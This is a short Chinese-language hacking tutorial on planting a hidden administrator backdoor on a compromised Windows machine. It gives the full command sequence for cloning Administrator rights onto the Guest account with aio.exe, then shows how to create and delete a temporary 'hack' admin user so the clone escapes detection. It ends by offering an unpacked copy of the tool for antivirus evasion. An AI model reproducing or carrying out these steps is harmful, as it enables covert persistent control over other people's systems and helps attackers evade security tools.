我们用到的主角儿是aio.exe
首先我们将aio.exe 上传至肉鸡c:\盘根目录
然后在肉鸡cmd里输入cd\回车
跳至aio.exe所在目录
我们用到的是aio.exe的账户克隆功能
我们是要将Administrator用户权限克隆个Guest用户,并给guest用户添加登陆密码
输入Aio.exe -Clone Administrator Guest 123
(123为密码)
我们可以再次输入Aio.exe -CheckClone来检查克隆
正如上一句所说,这是可以通过一步就看出来被克隆的账户是Administrator,容易被发现
这里就有个技巧
我们可以自己新建一个管理用户,再将其克隆给guest,然后删除那个新建的用户
这样在检查克隆的时候,就显示不出来被克隆的用户了..
具体命令如下:
net user hack 123 /add 建立用户
net localgroup administrators hack /add 把“hack”添加到管理员中使其具有管理员权限
Aio.exe -Clone hack Guest 123 克隆用户
net user hack /del 删除hack用户
Aio.exe -CheckClone 检查克隆
这样以来,我们就可以对肉鸡建立了超级隐藏账户了
另外,我搞到了一个脱壳的aio.exe,有能力给他免杀的朋友找我要